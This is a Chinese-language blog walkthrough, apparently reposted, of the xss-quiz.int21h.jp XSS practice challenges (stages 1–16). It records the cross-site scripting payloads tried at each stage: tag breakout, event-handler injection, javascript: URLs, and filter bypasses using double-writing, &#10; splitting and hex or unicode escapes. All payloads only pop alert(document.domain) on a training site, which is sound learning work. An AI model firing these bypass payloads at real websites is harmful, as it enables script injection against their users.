码迷,mamicode.com
首页 > 其他好文 > 详细

XSS challenges 1-16

时间:2020-05-23 22:59:17      阅读:111      评论:0      收藏:0      [点我收藏+]

标签:line   Suite   over   row   抓包   max   直接   rip   进制   

看了一遍视频后自己再试一试,挠头

https://xss-quiz.int21h.jp/

Stage #1

输入1111

显示

技术图片

 

 

 查看代码

技术图片

 

 

 直接输入

<script>alert(document.domain);</script>

 

Stage #2

输入1111

查看代码,如图

技术图片

 

 

 尝试闭合标签

1111 "><script>alert(document.domain)</script>

成功,并且代码显示为

技术图片

 

 

Stage #3

输入1111

代码显示为

技术图片

 

 

 尝试

"><script>alert(document.domain);</script>

显示

技术图片

 

 

 考虑在Japan后进行闭合,打开Burpsuite,进行如图修改

技术图片

 

 

 

p1=1111&p2=Japan >"<script>alert(document.domain)</script>

 成功

 

Stage #4

输入1111

技术图片

 

 

 能发现有个hidden,抓包后能看到

技术图片

 

则尝试在hackme后面添加”><script>alert(document.domain)</script>

技术图片

 

 

 成功

 

Stage #5

输入1111

查看代码

技术图片

 

 

 maxlength只有15,如果输入

"><script>alert(document.domain)</script>不够长

 如图

技术图片

 

 

 则修改maxlength

技术图片

 

 

 再次输入"><script>alert(document.domain)</script>

技术图片

 

 

 成功

 

 

Stage #6

输入1111,查看代码

技术图片

 

 

 尝试闭合,输入"><script>alert(document.domain)</script>

"、<、>都被转换

技术图片

 

 

 尝试" onmouseover="alert(document.domain)

技术图片

 

 

 成功,代码显示为技术图片

 

 

 

 

Stage #7

输入1111,查看代码

技术图片

 

 

 尝试"><script>alert(document.domain)</script>

显示技术图片

 

 

 尝试" onmouseover="alert(document.domain)

显示

技术图片

 

 

 观察代码,好像多了两个双引号,尝试onmouseover=alert(document.domain)

显示技术图片

 

 

 挠头,再试试"onmouseover=alert(document.domain)

技术图片

 

 

 挠头

看看hint

Hint: nearly the same... but a bit more tricky.再看看代码

试试"       onmouseover=alert(document.domain)

行了技术图片

 

 

 

Stage #8

输入1111,查看代码

技术图片

 

 

 和页面显示的技术图片

 

 

 尝试javascript:alert(document.domain)

点击产生的url

技术图片

 

 

 成功

 

Stage #9

输入1111

技术图片

 

 

 眼熟,嗯

先试试"><script>alert(document.domain)</script>

技术图片

 

 

 果然不行,再试试"onmouseover=alert(document.domain),还是不行

技术图片

 

 

 再试试">,还是被变成了字符串的形式

技术图片

 

 

 

再看看hint

Hint: UTF-7 XSS,挠头

跳过

在console里输入

技术图片

 

 

 进入下一关

Stage #10

先输入1111,看代码

技术图片

 

 

 好像比较正常,试试

"><script>alert(document.domain)</script>

技术图片

 

 

 我的domain呢??

试试双写

"><script>alert(document.domdomainain)</script>

ok了

Stage #11

输入1111

技术图片

 

 

 比较正常,试试"><script>alert(document.domain)</script>

技术图片

 

 

 技术图片

 

 

 被转换了

再试试"onmouseover=alert(document.domain)

技术图片

 

 

 onmouseover被过滤了

再试试"><a href="javascript:alert(documment.domain)">xss</a>

技术图片

 

 

 技术图片

 

挠头,被转换了

试试&#10;将JavaScript分开

"><a href="javascr&#10;ipt:alert(document.domain);">xss<a>

技术图片

 点击xss

成功

 

Stage #12

输入1111,查看代码

技术图片

 

 挺正常的,试试"><script>alert(document.domain)</script>

技术图片

 

 >,<都被消去了,看看hint试试将<,>转换成16进制

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

技术图片

 

 挠头,试试

"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

挠头,百度启动,要在IE浏览器中用``,

跳过

Stage #13

好像这个的操作别的浏览器不支持了,只有IE支持

跳过

Stage #14

挠头,跳过

Stage #15

输入1111,看代码

技术图片

 

技术图片

 

 

挠头,挺正常,试试"><script>alert(document.domain)</script>

 技术图片

 

挠头,试试转换<,>

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

 技术图片

 

再试试"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

 技术图片

 

 ok

Stage #16

直接unicode转换

"\\u003e\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

ok

 

  • 添加到短语集
     
    • https://www.nationalgeographic.com/magazine/2020/01/scientists-are-unraveling-the-mysteries-of-pain-feature/
    • 创建新的单词集...
  • 拷贝

XSS challenges 1-16

标签:line   Suite   over   row   抓包   max   直接   rip   进制   

原文地址:https://www.cnblogs.com/coxq/p/12944936.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!